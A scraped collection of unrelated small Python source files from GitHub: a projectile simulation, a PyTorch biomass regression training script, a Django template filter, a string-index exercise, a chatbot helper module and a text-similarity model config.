Visina objekta je:', self.h0, 'm, brzina objekta je:', self.v_x, 'm/s.')\r\n\r\n def promijeniVisinu(self, h_new):\r\n self.h0 = h_new\r\n return self.h0\r\n \r\n def promijeniBrzinu(self, v_new):\r\n self.v_x = self.v_x + v_new \r\n return self.v_x\r\n\r\n def dropProjectile(self, dt=0.01, vjetar = 0):\r\n self.x = [0]\r\n self.a_x = vjetar\r\n self.vx_projektila = [self.v_x]\r\n self.h = [self.h0]\r\n self.vy = [0]\r\n self.t = [0]\r\n g = 9.81 #m/s^2\r\n\r\n while self.h[-1]>0:\r\n self.x.append(self.x[-1]+self.vx_projektila[-1]*dt)\r\n self.t.append(self.t[-1]+dt)\r\n self.vy.append(self.vy[-1]+dt*g)\r\n self.h.append(self.h[-1]-self.vy[-1]*dt)\r\n self.vx_projektila.append(self.vx_projektila[-1]+self.a_x*dt)\r\n\r\n return self.x, self.h, self.t, self.vy\r\n\r\n def vrijemePadanja(self, dt=0.01):\r\n self.dropProjectile(dt)\r\n return self.t[-1]\r\n\r\n def gadjanjeMete(self, x_mete, sirina, v_vjetra = 0):\r\n self.x_projektila = [0]\r\n self.t_gibanja = [0]\r\n self.h_projektila = [self.h0]\r\n\r\n time = np.arange(0, 100, 0.1)\r\n\r\n for t in time:\r\n\r\n while self.t_gibanja[-1]= x_mete-sirina and xx <= x_mete+sirina):\r\n trenutakIspustanja = t\r\n break\r\n\r\n\r\n for i in range (len(x_padanja)):\r\n x_padanja[i] = x_padanja[i]+self.x_projektila[-1]\r\n\r\n \r\n xxx = self.x_projektila + x_padanja\r\n yyy = self.h_projektila + h\r\n\r\n plt.plot(xxx, yyy)\r\n plt.title('Putanja projektila')\r\n plt.xlabel('x/m')\r\n plt.ylabel('y/m')\r\n plt.show()\r\n \r\n\r\n return trenutakIspustanja\r\n\r\n\r\n","repo_name":"anacavar/PAF","sub_path":"Kolokvij/modul.py","file_name":"modul.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35708720824","text":"import sys\r\nfrom pathlib import Path\r\nimport re\r\nimport os\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn.functional as F\r\nimport tqdm\r\nfrom torch_geometric.loader import DataLoader\r\nfrom torch_geometric.data import InMemoryDataset, Data\r\nfrom torch.utils.data import Sampler, ConcatDataset\r\n\r\nfrom shapely.geometry import Polygon\r\nfrom osgeo import gdal, gdal_array\r\ngdal.UseExceptions()\r\nimport laspy\r\nfrom laxpy.tree import LAXTree\r\nfrom laxpy.file import LAXParser\r\n\r\n\r\nfrom pn2_scalar_regressor import Net\r\nimport rasterizer\r\nfrom HDF5Loader import HDF5BiomassPointCloud\r\n\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\ndef train(model, optimizer, scheduler, train_loader, device, path):\r\n model.train()\r\n loss_list = []\r\n for i, data in enumerate(tqdm.tqdm(train_loader, desc=\"Training\")):\r\n if data.y.shape[-1] != train_loader.batch_size:\r\n print(\"Skipping last batch (not a full batch\")\r\n continue\r\n data = data.to(device)\r\n optimizer.zero_grad()\r\n out = model(data)[:, 0]\r\n loss = F.mse_loss(out, data.y)\r\n loss.backward()\r\n optimizer.step()\r\n if (i + 1) % 1 == 0:\r\n l = loss.detach().to(\"cpu\").numpy()\r\n # print(f'[{i + 1}/{len(train_loader)}] RMSE Loss: {np.sqrt(l):.4f} ')\r\n loss_list.append(l)\r\n if (i + 1) % 1000 == 0:\r\n print(f'mean RMSE loss last 1000 it: {np.mean(np.sqrt(loss_list[-1000:]))}')\r\n\r\n scheduler.step()\r\n print(f'mean RMSE loss this epoch: {np.sqrt(np.mean(loss_list))}')\r\n print(f'mean RMSE loss last 1000 it: {np.sqrt(np.mean(loss_list[-1000:]))}')\r\n\r\n return np.mean(loss_list)\r\n\r\n\r\n@torch.no_grad()\r\ndef test(model, loader):\r\n 
model.eval()\r\n losses = []\r\n for idx, data in enumerate(tqdm.tqdm(loader, desc=\"Testing\")):\r\n data = data.to(device)\r\n outs = model(data)[:, 0]\r\n loss = F.mse_loss(outs, data.y)\r\n\r\n if (idx + 1) % 1000 == 0:\r\n print(\"Sample differences in biomass:\")\r\n print(data.y.to('cpu').numpy(), ' - ', outs.to('cpu').numpy(), ' = ',\r\n data.y.to('cpu').numpy() - outs.to('cpu').numpy())\r\n losses.append(float(loss.to(\"cpu\")))\r\n return float(np.mean(losses))\r\n\r\n\r\ndef main(args):\r\n lr = float(args[0])\r\n min_lr = float(args[1])\r\n n_points = int(args[2])\r\n bs = int(args[3])\r\n \r\n # train_dataset = HDF5BiomassPointCloud(lasfiles=list(Path(r\"D:\\lwiniwar\\data\\uncertaintree\\PetawawaHarmonized\\Harmonized\\2012_ALS\\3_tiled_norm\").glob(\"*.laz\")),\r\n # biomassfile=os.path.expandvars(r\"D:\\lwiniwar\\data\\uncertaintree\\DeepBiomass\\RF_PRF_biomass_Ton_DRY_masked_train.tif\"),\r\n # backup_extract=os.path.expandvars(r\"D:\\lwiniwar\\data\\uncertaintree\\DeepBiomass\\train_presel.hdf5\"),\r\n # max_points=n_points\r\n # )\r\n # train_loader = DataLoader(train_dataset, batch_size=bs, shuffle=False,\r\n # num_workers=16)\r\n #\r\n # test_dataset = HDF5BiomassPointCloud(lasfiles=list(Path(r\"D:\\lwiniwar\\data\\uncertaintree\\PetawawaHarmonized\\Harmonized\\2012_ALS\\3_tiled_norm\").glob(\"*.laz\")),\r\n # biomassfile=os.path.expandvars(r\"D:\\lwiniwar\\data\\uncertaintree\\DeepBiomass\\RF_PRF_biomass_Ton_DRY_masked_val.tif\"),\r\n # backup_extract=os.path.expandvars(r\"D:\\lwiniwar\\data\\uncertaintree\\DeepBiomass\\val_presel.hdf5\"),\r\n # max_points=n_points\r\n # )\r\n # test_loader = DataLoader(test_dataset, batch_size=bs, shuffle=False,\r\n # num_workers=16)\r\n\r\n train_dataset_2012 = HDF5BiomassPointCloud(lasfiles=list(Path(r\"/tmp/lwiniwar/2012_norm\").glob(\"*.laz\")),\r\n biomassfile=os.path.expandvars(r\"$DATA/PetawawaHarmonized/biom_2012_train.tif\"),\r\n backup_extract=os.path.expandvars(r\"/tmp/lwiniwar/train_presel_2012.hdf5\"),\r\n max_points=n_points\r\n )\r\n train_dataset_2018 = HDF5BiomassPointCloud(lasfiles=list(Path(r\"/tmp/lwiniwar/2018_norm\").glob(\"*.laz\")),\r\n biomassfile=os.path.expandvars(r\"$DATA/PetawawaHarmonized/biom_2018_train.tif\"),\r\n backup_extract=os.path.expandvars(r\"/tmp/lwiniwar/train_presel_2018.hdf5\"),\r\n max_points=n_points\r\n )\r\n\r\n train_dataset = ConcatDataset([train_dataset_2012, train_dataset_2018])\r\n\r\n train_loader = DataLoader(train_dataset, batch_size=bs, shuffle=True,\r\n num_workers=16)\r\n\r\n\r\n\r\n test_dataset_2012 = HDF5BiomassPointCloud(lasfiles=list(Path(r\"/tmp/lwiniwar/2012_norm\").glob(\"*.laz\")),\r\n biomassfile=os.path.expandvars(r\"$DATA/PetawawaHarmonized/biom_2012_val.tif\"),\r\n backup_extract=os.path.expandvars(r\"/tmp/lwiniwar/val_presel_2012.hdf5\"),\r\n max_points=n_points\r\n )\r\n\r\n test_dataset_2018 = HDF5BiomassPointCloud(lasfiles=list(Path(r\"/tmp/lwiniwar/2018_norm\").glob(\"*.laz\")),\r\n biomassfile=os.path.expandvars(r\"$DATA/PetawawaHarmonized/biom_2018_val.tif\"),\r\n backup_extract=os.path.expandvars(r\"/tmp/lwiniwar/val_presel_2018.hdf5\"),\r\n max_points=n_points\r\n )\r\n\r\n test_dataset = ConcatDataset([test_dataset_2012, test_dataset_2018])\r\n test_loader = DataLoader(test_dataset, batch_size=bs, shuffle=False,\r\n num_workers=16)\r\n\r\n print(f\"Using {device} device.\")\r\n model = Net(num_features=0).to(device)\r\n optimizer = torch.optim.Adam(model.parameters(), lr=lr) #, weight_decay=dc)\r\n scheduler = 
torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=50, eta_min=min_lr, last_epoch=-1, verbose=True)\r\n model_path = os.path.expandvars(\r\n rf'$DATA/PetawawaHarmonized/models/deepbiomass_lr{lr}_minLR{min_lr}_bs{bs}_{n_points}pts_normXYZ_2012+18.model')\r\n\r\n if os.path.exists(model_path):\r\n model = torch.load(model_path)\r\n print('loading existing model')\r\n\r\n for epoch in range(1, 1001):\r\n train_mse = train(model, optimizer, scheduler, train_loader, device, model_path)\r\n torch.save(model, model_path)\r\n test_mse = test(model, test_loader)\r\n\r\n with open(model_path.replace('.model', '.csv'), 'a') as f:\r\n f.write(\r\n f'{epoch}, {train_mse}, {test_mse}, {optimizer.param_groups[0][\"lr\"]}\\n'\r\n )\r\n print(f'Epoch: {epoch:02d}, Mean test MSE: {test_mse:.4f}')\r\n print(f'Epoch: {epoch:02d}, Mean train MSE: {train_mse:.4f}')\r\n\r\n\r\nif __name__ == '__main__':\r\n print('lr min_lr num_points batch_size')\r\n main(sys.argv[1:])\r\n","repo_name":"lwiniwar/DeepBiomass","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20698354113","text":"#coding=utf-8\r\n\r\n'''\r\n@author: 潘飞(cnweike@gmail.com)\r\n'''\r\n\r\nfrom django import template\r\nregister = template.Library()\r\n\r\n@register.filter\r\ndef limit(value,limit):\r\n '''需要一个长度参数'''\r\n limit = int(limit)\r\n addspots = False\r\n if len(value) > limit:\r\n addspots = True\r\n value = value[:limit]\r\n if addspots:\r\n value += '...'\r\n return value","repo_name":"killimpossible/opengroup","sub_path":"main/templatetags/main_filters.py","file_name":"main_filters.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"7810647438","text":"'''\nGiven a string that may contain a letter f. Print the index of the first\nand last occurrence of f. If the letter f occurs only once, then output\nits index once. If the letter f does not occur, print -1.\n'''\ns = input()\nind1 = ind2 = -1\nfor x in range(len(s)):\n if s[x] == 'f':\n if ind1 == -1:\n ind1 = x\n ind2 = x\n else:\n ind2 = x\nif ind1 == ind2:\n print(ind1)\nelse:\n print(ind1, ind2)\n","repo_name":"cookiewho/IPS_Workshop_2020","sub_path":"Python Practice/5.5_FirstAndLastOccurance.py","file_name":"5.5_FirstAndLastOccurance.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70585930386","text":"import warnings\nimport wikipedia\nimport datetime\nfrom PyDictionary import PyDictionary\n\ndictionary = PyDictionary()\nwarnings.filterwarnings('ignore')\n\n\ndef dic(dicSearch):\n try:\n dicResults = dictionary.meaning(dicSearch)\n results = dicResults.items()\n return results\n except EOFError as e:\n error = \"Sorry, i quite can't get the meaning of \" + dicSearch + \" right now.\"\n return error\n\n\ndef dateTime():\n current_time = datetime.datetime.now().strftime('%I:%M %p')\n return current_time\n\n\ndef wiki(wikiSearch):\n try:\n searchResults = wikipedia.summary(wikiSearch, sentences=2)\n return searchResults\n except EOFError as e:\n error = \"Sorry, i can't quite get to wikipedia right now.\"\n return error\n\n\ndef makeNote(myBotName):\n note = input(myBotName + \" Said : \\n What do want to note down? 
:\")\n if note != \"\":\n done = False\n while not done:\n with open(\"notes\" + '.txt', 'a') as w:\n w.write(\"\\n\" + note)\n done = True\n print(myBotName + \" Said : \\n I have created the note\")\n\n\ndef getNote():\n with open(\"notes\" + '.txt', 'r') as w:\n return w.read()","repo_name":"Faruq-Abdulrazaq/pisciumBot","sub_path":"additionalFunctionalities.py","file_name":"additionalFunctionalities.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19817933330","text":"from sqlalchemy.ext.asyncio import AsyncConnection\n\nfrom ...schemas.gameenums import COND_TYPE_NAME\nfrom ...schemas.nice import NiceCommonRelease\nfrom ...schemas.raw import MstCommonRelease\nfrom ..raw import get_common_releases\n\n\ndef get_nice_common_release(release: MstCommonRelease) -> NiceCommonRelease:\n return NiceCommonRelease(\n id=release.id,\n priority=release.priority,\n condGroup=release.condGroup,\n condType=COND_TYPE_NAME[release.condType],\n condId=release.condId,\n condNum=release.condNum,\n )\n\n\nasync def get_nice_common_releases_from_id(\n conn: AsyncConnection, common_release_id: int\n) -> list[NiceCommonRelease]:\n return [\n get_nice_common_release(common_release)\n for common_release in await get_common_releases(conn, [common_release_id])\n ]\n","repo_name":"atlasacademy/fgo-game-data-api","sub_path":"app/core/nice/common_release.py","file_name":"common_release.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"48"} +{"seq_id":"184586355","text":"\"\"\"\nTetris Simulator\n\nAuthor - Anqi Li (anqil4@cs.washington.edu)\nAdapted from the java simulator from Drew Bagnell's\ncourse at Carnegie Mellon University\n\n\"\"\"\n\n\nimport gym\nfrom gym.utils import seeding\nimport numpy as np\nimport copy \n\nclass TetrisState:\n \"\"\"\n the tetris state\n \"\"\"\n def __init__(self, field, top, next_piece, lost, turn, cleared):\n # the board configuration\n self.field = field\n # the top position\n self.top = top\n # the piece ID of the next piece\n self.next_piece = next_piece\n # whether the game has lost\n self.lost = lost\n # the current turn\n self.turn = turn\n # the number of rows cleared so far\n self.cleared = cleared \n\n def copy(self):\n return TetrisState(\n self.field.copy(),\n self.top.copy(),\n self.next_piece,\n self.lost,\n self.turn,\n self.cleared\n )\n\n\nclass TetrisEnv(gym.Env):\n metadata = {\n 'render.modes': ['ascii']\n }\n\n def __init__(self):\n print('********')\n self.n_cols = 10\n self.n_rows = 21\n self.n_pieces = 7\n self.state_size = 7\n self.score = 0\n self.game_end = False\n \n # the next several lists define the piece vocabulary in detail\n # width of the pieces [piece ID][orientation]\n # pieces: O, I, L, J, T, S, Z\n self.piece_orients = [1, 2, 4, 4, 4, 2, 2]\n self.piece_width = [\n [2],\n [1, 4],\n [2, 3, 2, 3],\n [2, 3, 2, 3],\n [2, 3, 2, 3],\n [3, 2],\n [3, 2]\n ]\n # height of pieces [piece ID][orientation]\n self.piece_height = [\n [2],\n [4, 1],\n [3, 2, 3, 2],\n [3, 2, 3, 2],\n [3, 2, 3, 2],\n [2, 3],\n [2, 3]\n ]\n self.piece_bottom = [\n [[0, 0]],\n [[0], [0, 0, 0, 0]],\n [[0, 0], [0, 1, 1], [2, 0], [0, 0, 0]],\n [[0, 0], [0, 0, 0], [0, 2], [1, 1, 0]],\n [[0, 1], [1, 0, 1], [1, 0], [0, 0, 0]],\n [[0, 0, 1], [1, 0]],\n [[1, 0, 0], [0, 1]]\n ]\n self.piece_top = [\n [[2, 2]],\n [[4], [1, 1, 1, 1]],\n [[3, 1], [2, 2, 2], [3, 3], [1, 1, 2]],\n [[1, 3], [2, 1, 1], 
[3, 3], [2, 2, 2]],\n [[3, 2], [1, 2, 1], [2, 3], [1, 2, 1]],\n [[1, 2, 2], [3, 2]],\n [[2, 2, 1], [2, 3]]\n ]\n self.piece_real_weight = [\n [[2, 2]],\n [[1,1,1,1],[4]],\n [[2,1,1],[1,3],[1,1,2],[3,1]],\n [[2,1,1],[3,1],[1,1,2],[1,3]],\n [[1,2,1],[1,3],[1,2,1],[3,1]],\n [[2,2],[1,2,1]],\n [[2,2],[1,2,1]]\n ]\n\n # initialize legal moves for all pieces\n self.legal_moves = []\n for i in range(self.n_pieces):\n piece_legal_moves = []\n for j in range(self.piece_orients[i]):\n for k in range(self.n_cols + 1 - self.piece_width[i][j]):\n piece_legal_moves.append([j, k])\n self.legal_moves.append(piece_legal_moves)\n\n self.state = None\n self.cleared_current_turn = 0\n\n def seed(self, seed=None):\n \"\"\"\n set the random seed for the environment\n \"\"\"\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def step(self, action):\n \"\"\"\n make a move based on the orientation and slot\n \"\"\"\n orient, slot = action\n self.state.turn += 1\n\n # height of the field\n height = max(\n self.state.top[slot+c] - self.piece_bottom[self.state.next_piece][orient][c]\n for c in range(self.piece_width[self.state.next_piece][orient])\n )\n\n # check if game ended\n if height + self.piece_height[self.state.next_piece][orient] >= self.n_rows:\n self.state.lost = True\n self.score += self._get_reward()\n return self.state, self._get_reward(), True, 0\n\n # for each column in the piece - fill in the appropriate blocks\n for i in range(self.piece_width[self.state.next_piece][orient]):\n # from bottom to top of brick\n for h in range(height + self.piece_bottom[self.state.next_piece][orient][i], height + self.piece_top[self.state.next_piece][orient][i]):\n self.state.field[h, i+slot] = self.state.turn\n\n # adjust top\n for c in range(self.piece_width[self.state.next_piece][orient]):\n self.state.top[slot+c] = height + self.piece_top[self.state.next_piece][orient][c]\n\n # check for full rows - starting at the top\n self.cleared_current_turn = 0\n for r in range(height + self.piece_height[self.state.next_piece][orient] - 1, height - 1, -1):\n # if the row was full - remove it and slide above stuff down\n if np.all(self.state.field[r] > 0):\n self.cleared_current_turn += 1\n self.state.cleared += 1\n # for each column\n for c in range(self.n_cols):\n # slide down all bricks\n self.state.field[r:self.state.top[c], c] = self.state.field[(r+1):(self.state.top[c]+1), c]\n # lower the top\n self.state.top[c] -= 1\n while self.state.top[c] >= 1 and self.state.field[self.state.top[c]-1, c] == 0:\n self.state.top[c] -= 1\n\n self.score += self.cleared_current_turn\n # pick a new piece\n self.state.next_piece = self._get_random_piece()\n return self.state.copy(), self._get_reward(), False, self.cleared_current_turn\n\n\n\n def reset(self):\n lost = False\n turn = 0\n cleared = 0\n\n field = np.zeros((self.n_rows, self.n_cols), dtype=np.int)\n top = np.zeros(self.n_cols, dtype=np.int)\n next_piece = self._get_random_piece()\n self.state = TetrisState(field, top, next_piece, lost, turn, cleared)\n self.score = 0\n return self.get_features(np.flip(copy.deepcopy(field)),self.state.top,0,0,False)\n\n def render(self, mode='ascii'):\n print('\\nThe wall:')\n print('-' * (2 * self.n_cols + 1))\n for r in range(self.n_rows - 1, -1, -1):\n render_string = '|'\n for c in range(self.n_cols):\n if self.state.field[r, c] > 0:\n render_string += '*|'\n else:\n render_string += ' |'\n render_string += ''\n print(render_string)\n print('-' * (2 * self.n_cols + 1))\n\n print('\\nThe next piece:')\n if 
self.state.next_piece == 0:\n print('**\\n**')\n elif self.state.next_piece == 1:\n print('****')\n elif self.state.next_piece == 2:\n print('*\\n*\\n**')\n elif self.state.next_piece == 3:\n print(' *\\n *\\n**')\n elif self.state.next_piece == 4:\n print(' * \\n***')\n elif self.state.next_piece == 5:\n print(' **\\n**')\n elif self.state.next_piece == 6:\n print('**\\n **')\n\n\n\n def close(self):\n pass\n\n def _get_random_piece(self):\n \"\"\"\n return an random integer 0-6\n \"\"\"\n return np.random.randint(self.n_pieces)\n\n def _get_reward(self):\n \"\"\"\n reward function\n \"\"\"\n return 1+self.score\n # return 0.0\n\n def get_actions(self):\n \"\"\"\n gives the legal moves for the next piece\n :return:\n \"\"\"\n return self.legal_moves[self.state.next_piece]\n\n def set_state(self, state):\n \"\"\"\n set the field and the next piece\n \"\"\"\n self.state = state.copy()\n\n def clear_lines(self,field,orient,slot):\n \n lines_to_clear = [index for index, row in enumerate(field) if np.all(field[index] > 0)]\n eroded = 0\n clear_piece = 0\n if lines_to_clear != []:\n for i in range(self.piece_height[self.state.next_piece][orient]):\n if (self.n_rows-(self.state.top[slot]+(self.piece_height[self.state.next_piece][orient]-(i+1)))) in lines_to_clear:\n clear_piece += (self.piece_real_weight[self.state.next_piece][orient][i])\n eroded = len(lines_to_clear) * clear_piece\n field = [row for index, row in enumerate(field) if index not in lines_to_clear]\n # Add new lines at the top\n for _ in lines_to_clear:\n field.insert(0, [0 for _ in range(self.n_cols)])\n\n return len(lines_to_clear),eroded, np.array(field)\n\n\n\n def get_wells_height(self, field):\n WIDTH = 10\n wells_height = 0\n HEIGHT = 21\n for x in range(1, WIDTH-1):\n for y in range(HEIGHT):\n if field[y][x] == 0 and field[y][x-1] != 0 \\\n and field[y][x+1] != 0:\n wells_height += 1\n for _y in range(y+1, 21):\n if field[_y][x] != 0:\n break\n wells_height += 1\n\n for y in range(HEIGHT):\n # check wells in the leftmost boarder of the board\n if field[y][0] == 0 and field[y][1] != 0:\n wells_height += 1\n for _y in range(y+1, 21):\n if field[_y][x] != 0:\n break\n wells_height += 1\n\n # check wells in the rightmost border of the board\n if field[y][WIDTH-1] == 0 and field[y][WIDTH-2] != 0:\n wells_height += 1\n for _y in range(y+1, 21):\n if field[_y][x] != 0:\n break\n wells_height += 1\n\n return wells_height\n\n def get_holes_at_square(self, field,row_index,col_index):\n row_index = 0\n holes_at_square = 1\n\n while row_index < len(field) - 1:\n if field[row_index][col_index] == 0:\n holes_at_square += 1\n row_index += 1\n else:\n break\n\n return holes_at_square\n\n def get_holes(self, field):\n \n holes = 0\n\n for row_index, row in enumerate(field):\n if row_index == 0: continue\n for col_index, square in enumerate(row):\n if square == 0 and field[row_index - 1][col_index] > 0:\n holes += self.get_holes_at_square(field, row_index, col_index)\n\n return holes\n\n def get_bumpiness(self,field):\n total_bumpiness = 0\n max_bumpiness = 0\n min_ys = []\n\n for col in zip(*field):\n i = 0\n while i < self.n_rows and col[i] ==0:\n i += 1\n min_ys.append(i)\n \n for i in range(len(min_ys) - 1):\n bumpiness = abs(min_ys[i] - min_ys[i+1])\n max_bumpiness = max(bumpiness, max_bumpiness)\n total_bumpiness += abs(min_ys[i] - min_ys[i+1])\n\n return total_bumpiness, max_bumpiness\n\n def get_height(self,field):\n sum_height = 0\n max_height = 0\n min_height = self.n_rows\n\n for col in zip(*field):\n i = 0\n while i < 
self.n_rows and col[i] == 0:\n i += 1\n height = self.n_rows - i\n sum_height += height\n if height > max_height:\n max_height = height\n elif height < min_height:\n min_height = height\n\n return sum_height, max_height, min_height\n\n def get_row_transitions(self,field):\n total = 0\n for r in range(self.n_rows):\n row_count = 0\n last_empty = False\n for c in range(self.n_cols):\n empty = field[r][c] == 0\n if last_empty != empty:\n row_count += 1\n last_empty = empty\n if last_empty:\n row_count += 1\n if last_empty and row_count == 2:\n continue\n total += row_count\n return total\n\n def get_cumulative_wells(self,field):\n wells = [0 for i in range(self.n_cols)]\n for y, row in enumerate(field):\n left_empty = True\n for x, code in enumerate(row):\n if code == 0:\n well = False\n right_empty = self.n_cols > x + 1 >= 0 and field[y][x + 1] == 0\n if left_empty or right_empty:\n well = True\n wells[x] = 0 if well else wells[x] + 1\n left_empty = True\n else:\n left_empty = False\n return sum(wells)\n\n def get_col_transitions(self,field):\n total = 0\n for c in range(self.n_cols):\n column_count = 0\n last_empty = False\n for r in reversed(range(self.n_rows)):\n empty = field[r][c] == 0\n if last_empty and not empty:\n column_count += 2\n last_empty = empty\n if last_empty and column_count == 1:\n continue\n total += column_count\n return total\n\n def get_row_holes(self, field):\n row_holes = 0\n\n for row_index, row in enumerate(field):\n if row_index == 0: continue\n for col_index, square in enumerate(row):\n if square == 0:\n row_holes+=row_holes\n break\n return row_holes\n \n def get_hole_count(self,field):\n hole_count = 0\n for x in range(self.n_cols):\n below = False\n for y in range(self.n_rows):\n empty = field[y][x] == 0\n if not below and not empty:\n below = True\n elif below and empty:\n hole_count += 1\n\n return hole_count\n\n def get_features(self,field,top,orient,slot,start):\n landheight = 0\n max_height=0\n eroded = 0\n col_trans = 0\n row_trans = 0\n holes = 0\n well = 0\n lines = 0\n total_bumpiness = 0\n hole_count = 0\n top_position = 0\n depth=0\n sum_height = 0\n if start:\n for i in range(self.piece_width[self.state.next_piece][orient]):\n top_position = max(top_position,self.state.top[slot+i])\n landheight = max(landheight,self.piece_top[self.state.next_piece][orient][i])\n \n landheight = top_position+landheight\n lines,eroded,field = self.clear_lines(field,orient,slot)\n total_bumpiness, max_bumpiness = self.get_bumpiness(field)\n\n col_trans = self.get_col_transitions(field)\n row_trans = self.get_row_transitions(field)\n\n well = self.get_wells_height(field)\n sum_height, max_height, min_height = self.get_height(field)\n hole_count = self.get_hole_count(field)\n depth = self.get_row_holes(field)\n top_list = top.tolist()\n diff_list = [abs(top_list[j]-top_list[j+1]) for j in range(len(top_list)-1) ]\n result = [landheight,eroded,row_trans,col_trans,hole_count,well,depth]\n return result\n\n def get_next_states(self):\n next_states = {}\n legal_moves = self.get_actions()\n for orient, slot in legal_moves:\n out_flag = 0\n height = max(\n self.state.top[slot+c] - self.piece_bottom[self.state.next_piece][orient][c]\n for c in range(self.piece_width[self.state.next_piece][orient])\n )\n\n field = copy.deepcopy(self.state.field)\n # for each column in the piece - fill in the appropriate blocks\n for i in range(self.piece_width[self.state.next_piece][orient]):\n # from bottom to top of brick\n for h in range(height + 
self.piece_bottom[self.state.next_piece][orient][i], height + self.piece_top[self.state.next_piece][orient][i]):\n if h >= self.n_cols:\n out_flag = 1\n break\n field[h, i+slot] = self.state.turn + 1\n if out_flag == 1:\n break\n if out_flag == 1:\n next_states[(orient, slot)] = self.get_features(np.flip(field),self.state.top,orient,slot,True)\n if out_flag ==0 :\n next_states[(orient, slot)] = self.get_features(np.flip(field),self.state.top,orient,slot,True)\n\n return next_states\n\n def get_state_size(self):\n return self.state_size\n\n def get_score(self):\n return self.score\n \n \n\nif __name__ == \"__main__\":\n\n # run a random policy on the tetris simulator\n\n # np.random.seed(1)\n env = TetrisEnv()\n env.reset()\n #env.render()\n \n\n for _ in range(10):\n\n actions = env.get_actions()\n action = actions[np.random.randint(len(actions))]\n orient, slot = action\n action_state_dict = env.get_next_states()\n print(env.get_features(np.flip(env.state.field),env.state.top,orient,slot,True))\n state, reward, done, _ = env.step(action)\n env.render()\n if done:\n break\n\n\n\n\n\n","repo_name":"salemon/rl_tetris","sub_path":"tetris.py","file_name":"tetris.py","file_ext":"py","file_size_in_byte":17393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5733373097","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport sys\nfrom keras.activations import softmax\nsys.path.append('models/layers/')\nfrom MyPooling import MyMeanPool,MyMaxPool\n\nCustomObjects = {\"softmax\": softmax,'MyMaxPool':MyMaxPool}\n\n\n\nbatch_size = 128\nnumber_classes = 2\nw2v_vec_dim = 256\nword_maxlen = 40\n\n\nchar_maxlen= 40\nword_maxlen= 40\n\nmodel_dir = 'data/share/single/'\njieba_dict = 'data/share/jieba/jieba_dict.txt'\nstopwords_path = 'data/share/jieba/stops.txt'\norigin_csv = 'data/data/atec_nlp_sim_train2.csv'\n\ndata_augment = False\nshuffer = False\n\n\nnofeats = False\nif nofeats:\n feats = [u'pading1', u'pading2']\nelse:\n feats = [u'q1_freq', u'q2_freq', u'freq_mean', u'freq_cross', u'q1_freq_sq',\n u'q2_freq_sq',\n u'len_diff',\n u'shingle_similarity_1',\n u'shingle_similarity_2',\n u'shingle_similarity_3',\n u'common_words',\n 'cwc_min',\n 'cwc_max',\n 'csc_min',\n 'csc_max',\n 'ctc_min',\n 'ctc_max',\n 'last_word_eq',\n 'first_word_eq',\n 'abs_len_diff',\n 'mean_len',\n 'token_set_ratio',\n 'token_sort_ratio',\n 'fuzz_ratio',\n 'fuzz_partial_ratio',\n 'longest_substr_ratio']\n\n\n# 'bin_dist1',\n# 'bin_dist2',\n# 'diff1',\n# 'diff2',\n# 'diff_norm1',\n# 'diff_norm2',\n# 'diff_uni1',\n# 'diff_uni2',\n\n# 'inter_uni_r1',\n# 'inter_uni_r2',\n# 'intersect_r1',\n# 'intersect_r2',\n# 'jaccard_dist1',\n# 'jaccard_dist2',\n\n# 'len_diff',\n# 'masi_dist1',\n# 'masi_dist2',\n# 'max1',\n# 'max2',\n# 'min1',\n# 'min2',\n\n\n# 'q1_len',\n# 'q1_q2_intersect',\n# 'q1_sum1',\n# 'q1_sum2',\n# 'q1_uni1',\n# 'q1_uni2',\n\n\n# 'q2_len',\n# 'q2_sum1',\n# 'q2_sum2',\n# 'q2_uni1',\n# 'q2_uni2',\n\n\nuse_pre_train = False\n\n\ncut_char_level = False\n\n# if cut_char_level:\n\n# data_cut_hdf = 'data/cache/train_cut_char.hdf'\n# train_feats = 'data/cache/train_feats_char.hdf'\n# data_feat_hdf = 'data/cache/train_magic_char.hdf'\n# train_df = 'data/cache/train_magic_char_train_f{0}.hdf'.format(len(feats))\n# dev_df = 'data/cache/train_magic_char_more_dev_f{0}.hdf'.format(len(feats))\n\n \n# else:\n# data_cut_hdf = 'data/cache/train_cut_word.hdf'\n# train_feats = 'data/cache/train_feats_word.hdf'\n# data_feat_hdf = 'data/cache/train_magic_word.hdf'\n# train_df 
= 'data/cache/train_magic_word_train_f{0}.hdf'.format(len(feats))\n# dev_df = 'data/cache/train_magic_word_more_dev_f{0}.hdf'.format(len(feats))\n\n\ndata_cut_hdf = 'data/cache/train_cut.hdf'\nword_embed_weights = 'data/share/my_w2v/word_embed_weight.npy'\nw2v_content_word_model = 'data/share/my_w2v/train_char.model'\nchar_embed_weights = 'data/share/my_w2v/char_embed_weight.npy'\nw2v_content_char_model = 'data/share/my_w2v/train_word.model'\n\n\nif cut_char_level:\n stack_path = 'data/share/stack/char_'\nelse:\n stack_path = 'data/share/stack/word_'\n\n\ntrain_featdires = ['data/feats0_train.csv',\n 'data/feats1_train.csv',\n 'data/feats2_train.csv',\n ]\n\ntest_featdires = ['data/feats0_test.csv',\n 'data/feats1_test.csv',\n 